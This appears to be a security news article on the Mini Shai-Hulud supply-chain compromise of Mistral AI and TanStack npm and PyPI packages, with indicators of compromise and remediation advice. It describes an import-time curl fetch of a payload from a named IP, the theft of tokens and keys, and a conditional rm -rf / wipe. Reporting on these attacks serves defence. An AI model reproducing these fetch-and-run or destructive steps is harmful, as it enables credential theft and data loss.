Mini Shai-Hulud Supply-Chain Attack Hits Mistral AI, TanStack Packages

⏱ 8 min read · Last updated 2026-06-24

A malicious software supply-chain campaign tracked as Mini Shai-Hulud compromised official Mistral AI SDK packages and several widely used TanStack JavaScript libraries, security researchers disclosed in mid-May 2026. The infected packages silently exfiltrated GitHub personal access tokens, npm publishing credentials, cloud API keys, and CI/CD secrets from developer workstations and build runners, while a destructive secondary payload capable of wiping Linux hosts lay dormant under specific geographic conditions.

Microsoft Threat Intelligence and the security firm Aikido independently confirmed overlapping compromises spanning both the npm and PyPI registries. The affected packages collectively register tens of millions of downloads per week, placing thousands of downstream projects, enterprise CI pipelines, and production deployments within the blast radius of a single poisoned import.

Why It Matters

Modern software development runs on shared dependencies. The npm registry hosts over two million packages; the Python Package Index contains more than 400,000 projects. A single compromised package can fan out into thousands of downstream applications before detection, which is why supply-chain attacks have become one of the most leveraged threat vectors in the industry. According to Sonatype’s 2025 State of the Software Supply Chain report, malicious package uploads grew roughly 200% year over year, underscoring how dependency trust is now a primary attack surface.

Past incidents reinforce the stakes. The SolarWinds supply-chain compromise demonstrated how a single hijacked build pipeline can ripple through government agencies and Fortune 500 networks. The event-stream npm incident, the 3CX desktop-app attack, and the narrowly averted XZ Utils backdoor all reinforced the same lesson: when attackers seize a trusted upstream dependency, they inherit the trust of every downstream consumer. The Mini Shai-Hulud campaign sharpens that threat by targeting AI development tooling, cloud SDKs, and frontend frameworks simultaneously, ecosystems that ship code directly into production through automated publishing.

What’s New / How It Works

Aikido first raised the alarm after detecting that several TanStack packages had been republished with malicious code across two attack waves beginning around 19:20 UTC on May 11, 2026. The compromised packages included @tanstack/react-router, @tanstack/history, and @tanstack/router-core, core routing libraries used in thousands of React applications. Within hours, Aikido confirmed that three Mistral AI npm SDK packages, @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp, had been infected as part of the same ongoing campaign.

On the Python side, Microsoft Threat Intelligence disclosed that version 2.4.6 of the mistralai package on PyPI had been trojanized. Attackers injected malicious code directly into mistralai/client/__init__.py, a file that executes automatically whenever the package is imported. On Linux systems, that code used curl to silently retrieve a second-stage payload from a remote command-and-control server at IP address 83.142.209.194, saving it to /tmp/transformers.pyz. The filename was selected deliberately to resemble Hugging Face’s widely used Transformers machine-learning framework, allowing the malware to blend into AI development environments without raising suspicion.

Once dropped, the payload ran as a detached background process independent of the original Python session. Its primary function was credential harvesting: it swept the host for GitHub personal access tokens, npm publishing tokens, cloud provider API keys, SSH credentials, and CI/CD secrets. Microsoft analysts also identified country-aware logic that caused the malware to exit without executing on systems configured with Russian-language locales, a trait frequently observed in financially motivated cybercrime operations, though not definitive for attribution. More concerning, the payload contained a destructive branch capable of executing rm -rf / under certain geographic conditions, a command that irreversibly wipes the host filesystem. The malware suppressed visible errors throughout, making detection during normal development workflows unlikely.

The Numbers

3 TanStack packages compromised: @tanstack/react-router, @tanstack/history, and @tanstack/router-core, collectively downloaded tens of millions of times per week.
3 Mistral npm SDKs infected: @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp.
1 PyPI package trojanized: mistralai version 2.4.6, with injected code that executed automatically on import.
1 staging IP address: 83.142.209.194, used to fetch the /tmp/transformers.pyz second-stage payload.
Credential targets: GitHub personal access tokens, npm publishing tokens, cloud API keys, SSH keys, and CI/CD secrets.
Geographic evasion: Malware exits without executing on Russian-language system locales.
Destructive capacity: Conditional rm -rf / branch can irreversibly wipe Linux hosts.
~200% year-over-year growth: in malicious open-source package uploads, per Sonatype’s 2025 State of the Software Supply Chain report.

“Microsoft is investigating mistralai PyPI package v2.4.6 compromise. Attackers injected code in mistralai/client/__init__.py that executes on import, downloads hxxps://83[.]142[.]209[.]194/transformers.pyz to /tmp/transformers.pyz, and launches a second-stage payload on Linux.”

Microsoft Threat Intelligence, X post, May 12, 2026

A single infected package can cascade through thousands of projects, turning open-source trust into a weapon for credential theft and system destruction.

What Comes Next

Microsoft and Aikido both confirm the investigation remains active, and additional compromised packages are likely to surface as maintainers audit their publishing infrastructure and rotate exposed credentials. Microsoft has urged organizations to isolate any affected Linux hosts immediately, block outbound connections to 83.142.209.194, and hunt for indicators of compromise including /tmp/transformers.pyz, pgmonitor.py, and pgsql-monitor.service. Aikido separately advised developers to pin affected packages to safe versions and revoke any tokens that touched a machine where the malicious versions were installed.

Beyond this specific incident, expect follow-on disclosures from the PyPI and npm security teams as maintainers regain control of compromised accounts. Both registries have been expanding mandatory two-factor authentication and trusted-publishing requirements for high-impact packages, and a campaign of this scale will likely accelerate those policy shifts. The broader security community is also revisiting package signing, provenance verification, and automated anomaly detection in registry upload pipelines as structural defenses against the next wave.

What This Means for You

If your team builds or deploys software that depends on open-source AI libraries or frontend frameworks, this attack is a direct wake-up call. The compromised packages are official, well-known SDKs, not obscure transitive dependencies, which means standard allowlisting and reputation-based trust models would not have caught them. Your lockfiles, CI logs, and secret stores all need immediate attention.

Start with these concrete steps: review your project manifests and lockfiles for the exact compromised versions; run npm audit or pip-audit across your dependency trees; rotate every secret that may have been accessible from affected environments, prioritizing GitHub tokens, npm publishing tokens, and cloud provider keys; and inspect build logs for unexpected outbound connections to the staging IP. Longer term, adopt least-privilege scoping for CI tokens, pin dependency versions with integrity hashes, enable two-factor authentication on all package-manager accounts, and move cloud secrets out of developer laptops into a managed vault.

The speed at which AI developer tooling is advancing makes secure dependency management a governance requirement, not a nice-to-have. As AI-powered coding agents and automated git forges accelerate the pace of commits, they also multiply the number of systems and credentials a single infected package can reach. At the same time, the concentration of value in developer platforms, highlighted by deals like the SpaceX acquisition of Cursor for $60 billion, makes the toolchain itself a top-tier target. Every organization writing software today needs to treat its dependency tree as production infrastructure, because attackers already do.

The Bigger Picture

The Mini Shai-Hulud campaign is less about any single compromised package and more about an attacker economy that has internalized the economics of trust. Maintainers, AI SDKs, and frontend frameworks all sit upstream of millions of installs, making them the highest-leverage targets on the internet. Defenders need to assume that any popular package can be hijacked tomorrow and design their pipelines so that a stolen token, a tampered tarball, or a hostile import cannot escalate into a root-level incident. Treat your supply chain like production code, because to your adversaries, it already is.

Frequently Asked Questions

What is the Mini Shai-Hulud supply-chain attack?

Mini Shai-Hulud is the name researchers at Aikido and Microsoft Threat Intelligence are using for an ongoing software supply-chain campaign discovered in May 2026. The attackers compromised official npm packages in the TanStack and Mistral AI ecosystems, plus the mistralai package on PyPI. The infected packages silently download a second-stage payload that steals GitHub tokens, cloud API keys, and CI/CD secrets from developer machines and build runners. The malware also contains a destructive branch capable of wiping Linux hosts with an rm -rf / command under certain geographic conditions. The campaign name references the malware’s ability to burrow through trusted dependency chains.

Which Mistral AI packages were compromised?

On npm, Aikido identified malicious versions of @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp. On PyPI, Microsoft confirmed that the mistralai package version 2.4.6 had been trojanized, with injected code hidden inside mistralai/client/__init__.py that executed automatically whenever the package was imported on Linux systems. The code downloaded a second-stage payload disguised as transformers.pyz, a filename chosen to blend into machine-learning environments.

Which TanStack packages were affected?

Aikido reported that @tanstack/react-router, @tanstack/history, and @tanstack/router-core were republished with malicious code across two attack waves beginning around 19:20 UTC on May 11, 2026. These are core React routing libraries used in thousands of web applications, collectively downloaded tens of millions of times per week, which is what makes the compromise high-impact.

What credentials are at risk?

The second-stage malware is designed to harvest GitHub personal access tokens, npm publishing tokens, cloud provider API keys (AWS, GCP, and others), SSH credentials, and CI/CD secrets. Any developer workstation or CI runner that installed a compromised version and had these credentials accessible on the same machine should consider them compromised and rotate them immediately, even if no visible symptoms were observed.

How can I check if I was affected?

Review your project lockfiles and package manifests for the exact compromised versions: mistralai==2.4.6 on PyPI, and the listed npm package versions published during the attack window. On Linux build machines, check for the presence of /tmp/transformers.pyz, pgmonitor.py, or pgsql-monitor.service. Microsoft also recommends blocking outbound connections to IP address 83.142.209.194 and reviewing network logs for unexpected curl or download activity originating from development environments.

What should I do if I installed a compromised package?

Immediately rotate every credential that was accessible from the affected environment: GitHub tokens, npm publishing tokens, cloud API keys, SSH keys, and CI/CD variables. Isolate the host, remove the malicious package, and run a full security scan. If the host was a CI runner, regenerate all associated secrets and audit recent commits pushed from that runner for unauthorized changes. Then pin the affected packages to verified safe versions.

How can teams defend against supply-chain attacks like this?

Pin package versions with exact integrity hashes instead of floating version ranges. Enable two-factor authentication and trusted publishing on all package manager accounts. Scope CI tokens with least privilege and short expiration windows. Move secrets out of developer laptops and into a managed vault or secrets manager. Add automated CI checks that flag newly published dependencies with zero history or suspicious version bumps. Finally, treat every open-source import as a trust decision that should be reviewed, not automatically accepted.